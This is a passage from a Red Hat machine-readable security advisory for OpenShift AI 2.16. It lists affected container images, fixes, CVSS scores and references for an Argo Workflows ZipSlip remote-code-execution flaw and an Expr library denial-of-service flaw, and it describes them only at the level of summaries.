"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66626"
},
{
"category": "external",
"summary": "RHBZ#2420818",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420818"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66626",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66626"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66626",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66626"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-p84v-gxvw-73pf",
"url": "https://github.com/advisories/GHSA-p84v-gxvw-73pf"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/blob/5291e0b01f94ba864f96f795bb500f2cfc5ad799/workflow/executor/executor.go#L1034-L1037",
"url": "https://github.com/argoproj/argo-workflows/blob/5291e0b01f94ba864f96f795bb500f2cfc5ad799/workflow/executor/executor.go#L1034-L1037"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/6b92af23f35aed4d4de8b04adcaf19d68f006de1",
"url": "https://github.com/argoproj/argo-workflows/commit/6b92af23f35aed4d4de8b04adcaf19d68f006de1"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xrqc-7xgx-c9vh",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xrqc-7xgx-c9vh"
}
],
"release_date": "2025-12-09T20:19:14.680000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "No mitigation is currently available that meets Red Hat Product Security\u2019s standards for usability, deployment, applicability, or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/argoproj/argo-workflows: argoproj/argo-workflows is vulnerable to RCE via ZipSlip and symbolic links"
},
{
"cve": "CVE-2025-68156",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-12-16T19:01:42.049157+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2422891"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Expr, an expression language and expression evaluation for Go. This vulnerability allows a denial of service (DoS) via recursive traversal over user-provided deeply nested or cyclic data structures without enforcing a maximum recursion depth, leading to a stack overflow panic and application crash.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/expr-lang/expr: Expr: Denial of Service via uncontrolled recursion in expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat products utilizing the `Expr` Go library because it can lead to a denial-of-service. Exploitation requires an application to evaluate expressions against untrusted or insufficiently validated data structures containing deeply nested or cyclic references, which can cause a stack overflow and application crash. Products that do not process untrusted input with `Expr` are not affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68156"
},
{
"category": "external",
"summary": "RHBZ#2422891",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2422891"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68156"
},
{
"category": "external",
"summary": "https://github.com/expr-lang/expr/pull/870",
"url": "https://github.com/expr-lang/expr/pull/870"
},
{
"category": "external",
"summary": "https://github.com/expr-lang/expr/security/advisories/GHSA-cfpf-hrx2-8rv6",
"url": "https://github.com/expr-lang/expr/security/advisories/GHSA-cfpf-hrx2-8rv6"
}
],
"release_date": "2025-12-16T18:24:11.648000+00:00",
"remediations": [
{
"category": "vendor_fix",
